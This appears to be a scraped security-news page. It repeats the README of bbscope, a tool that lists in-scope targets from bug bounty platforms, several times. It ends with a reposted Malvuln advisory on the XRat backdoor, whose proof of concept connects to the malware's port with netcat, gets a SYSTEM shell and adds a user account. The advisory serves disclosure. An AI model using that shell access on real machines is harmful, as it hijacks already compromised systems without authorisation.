You'll get a list like this: https://hackerone.com/demo
https://hackerone.com/something
Beware of scope oddities
In an ideal world, all programs use the in-scope table in the same way to clearly show what's in scope, and make parsing easy. Unfortunately, that's not always the case. Sometimes assets are assigned the wrong category. For example, if you're going after URLs using the -c url, double checking using -c all is often a good idea. Other times, on HackerOne, you will find targets written in the scope description, instead of in the scope title. A few programs that do this are: Verizon Media (https://hackerone.com/verizonmedia/?type=team) Mail.ru (https://hackerone.com/mailru) If you want to grep those URLs as well, you MUST include d in the printing options flag (-o). Sometimes it gets even stranger: Spotify (https://hackerone.com/spotify) uses titles of the in-scope table to list wildcards, but then lists the actually in-scope subdomains (https://www.kitploit.com/search/label/Subdomains) in the targets description. Human minds are weird and this tool does not attempt to parse nonsense, you'll have to do that manually (or bother people that can make this change, maybe?).
Thanks
0xatul (https://github.com/0xatul) JoeMilian (https://github.com/JoeMilian) ByteOven (https://github.com/ByteOven) dee-see (https://gitlab.com/dee-see) jub0bs (https://jub0bs.com/)
Download Bbscope (https://github.com/sw33tLie/bbscope)
Bbscope - Scope Gathering Tool For HackerOne, Bugcrowd, And Intigriti!
The ultimate scope gathering tool for HackerOne, Bugcrowd, and Intigriti by sw33tLie. Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job. What about getting a list of android apps that you are allowed to test? We've got you covered as well. Reverse engineering god? No worries, you can get a list of binaries to analyze too :) Installation Make sure you've a recent version of the Go compiler installed on your system. Then just run: GO111MODULE=on go get -u github.com/sw33tLie/bbscope Usage bbscope (h1|bc|it) -t <session-token> <other-flags> How to get the session token: HackerOne: login, then grab the _Host-session cookie Bugcrowd: login, then grab the _crowdcontrol_session cookie Intigriti: login, then intercept a request to api.intigriti.com and look for the Authentication: Bearer XXX header. XXX is your token Remember that you can use the --help flag to get a description for all flags. Examples Below you'll find some example commands. Keep in mind that all of them work with Bugcrowd and Intigriti subcommands (bc and it) as well, not just with h1. Print all in-scope targets from all your HackerOne programs that offer rewards bbscope h1 -t <YOUR_TOKEN> -b -o t The output will look like this: app.example.com*.user.example.com*.demo.comwww.something.com Print all in-scope targets from all your private HackerOne programs that offer rewards bbscope h1 -t <YOUR_TOKEN> -b -p -o t Print all in-scope Android APKs from all your HackerOne programs bbscope h1 -t <YOUR_TOKEN> -o t -c android Print all in-scope targets from all your HackerOne programs with extra data bbscope h1 -t <YOUR_TOKEN> -o tdu -d ", " This will print a list of in-scope targets from all your HackerOne programs (including public ones and VDPs) but, on the same line, it will also print the target description (when available) and the program's URL. It might look like this: something.com, Something's main website, https://hackerone.com/something*.demo.com, All assets owned by Demo are in scope, https://hackerone.com/demo Get program URLs for your HackerOne private programs bbscope h1 -t <YOUR_TOKEN> -o u -p | sort -u You'll get a list like this: https://hackerone.com/demohttps://hackerone.com/something Beware of scope oddities In an ideal world, all programs use the in-scope table in the same way to clearly show what's in scope, and make parsing easy. Unfortunately, that's not always the case. Sometimes assets are assigned the wrong category. For example, if you're going after URLs using the -c url, double checking using -c all is often a good idea. Other times, on HackerOne, you will find targets written in the scope description, instead of in the scope title. A few programs that do this are: Verizon Media Mail.ru If you want to grep those URLs as well, you MUST include d in the printing options flag (-o). Sometimes it gets even stranger: Spotify uses titles of the in-scope table to list wildcards, but then lists the actually in-scope subdomains in the targets description. Human minds are weird and this tool does not attempt to parse nonsense, you'll have to do that manually (or bother people that can make this change, maybe?). Thanks 0xatul JoeMilian ByteOven dee-see jub0bs Download Bbscope
Read more...
The ultimate scope gathering tool for HackerOne, Bugcrowd, and Intigriti by sw33tLie. Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job. What about getting a list of android apps that you are allowed to test? We've got you covered as well. Reverse engineering god? No worries, you can get a list of binaries to analyze too :) Installation Make sure you've a recent version of the Go compiler installed on your system. Then just run: GO111MODULE=on go get -u github.com/sw33tLie/bbscope Usage bbscope (h1|bc|it) -t <session-token> <other-flags> How to get the session token: HackerOne: login, then grab the _Host-session cookie Bugcrowd: login, then grab the _crowdcontrol_session cookie Intigriti: login, then intercept a request to api.intigriti.com and look for the Authentication: Bearer XXX header. XXX is your token Remember that you can use the --help flag to get a description for all flags. Examples Below you'll find some example commands. Keep in mind that all of them work with Bugcrowd and Intigriti subcommands (bc and it) as well, not just with h1. Print all in-scope targets from all your HackerOne programs that offer rewards bbscope h1 -t <YOUR_TOKEN> -b -o t The output will look like this: app.example.com*.user.example.com*.demo.comwww.something.com Print all in-scope targets from all your private HackerOne programs that offer rewards bbscope h1 -t <YOUR_TOKEN> -b -p -o t Print all in-scope Android APKs from all your HackerOne programs bbscope h1 -t <YOUR_TOKEN> -o t -c android Print all in-scope targets from all your HackerOne programs with extra data bbscope h1 -t <YOUR_TOKEN> -o tdu -d ", " This will print a list of in-scope targets from all your HackerOne programs (including public ones and VDPs) but, on the same line, it will also print the target description (when available) and the program's URL. It might look like this: something.com, Something's main website, https://hackerone.com/something*.demo.com, All assets owned by Demo are in scope, https://hackerone.com/demo Get program URLs for your HackerOne private programs bbscope h1 -t <YOUR_TOKEN> -o u -p | sort -u You'll get a list like this: https://hackerone.com/demohttps://hackerone.com/something Beware of scope oddities In an ideal world, all programs use the in-scope table in the same way to clearly show what's in scope, and make parsing easy. Unfortunately, that's not always the case. Sometimes assets are assigned the wrong category. For example, if you're going after URLs using the -c url, double checking using -c all is often a good idea. Other times, on HackerOne, you will find targets written in the scope description, instead of in the scope title. A few programs that do this are: Verizon Media Mail.ru If you want to grep those URLs as well, you MUST include d in the printing options flag (-o). Sometimes it gets even stranger: Spotify uses titles of the in-scope table to list wildcards, but then lists the actually in-scope subdomains in the targets description. Human minds are weird and this tool does not attempt to parse nonsense, you'll have to do that manually (or bother people that can make this change, maybe?). Thanks 0xatul JoeMilian ByteOven dee-see jub0bs Download Bbscope
Read more...
GitHub
GitHub - sw33tLie/bbscope: Scope aggregation tool for HackerOne, Bugcrowd, Intigriti, YesWeHack, and Immunefi!
Scope aggregation tool for HackerOne, Bugcrowd, Intigriti, YesWeHack, and Immunefi! - sw33tLie/bbscope
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.XRat.d Code Execution
https://4.bp.blogspot.com/-slZrAXCcTc4/WWlvSkUdx-I/AAAAAAAAINc/GD9pE2wpupUfP-XcYlxrz5jw2m91dZTOgCLcBGAs/s1600/h39.png
Backdoor.Win32.XRat.d malware suffers from a code execution vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Backdoor.Win32.XRat.d Code Execution
https://4.bp.blogspot.com/-slZrAXCcTc4/WWlvSkUdx-I/AAAAAAAAINc/GD9pE2wpupUfP-XcYlxrz5jw2m91dZTOgCLcBGAs/s1600/h39.png
Backdoor.Win32.XRat.d malware suffers from a code execution vulnerability.
MD5 |
ad2b83a2b4643cd5bab9e2b00a386821Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/dc77b126b205b0f671e505766c607ef1.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.XRat.d
Vulnerability: Unauthenticated Remote Command Execution
Description: XRat malware runs with SYSTEM integrity and listens on TCP port 20888. Third-party attackers who can reach the system can connect, switch to DOS prompt mode and run any OS commands re-compromising the already infected system.
Type: PE32
MD5: dc77b126b205b0f671e505766c607ef1
Vuln ID: MVID-2021-0242
Dropped files: svhost.exe
Disclosure: 06/08/2021
Exploit/PoC:
nc64.exe 192.168.18.127 20888
"X-Rat System Console" v2.0
Status Ready, Client: 192.168.18.130:43857
[DESKTOP-2C4IRJO@C:\WINDOWS\system32]#DOS
Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
nt authority\system
C:\WINDOWS\system32>net user hyp3rlinx "" /add
The command completed successfully.
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com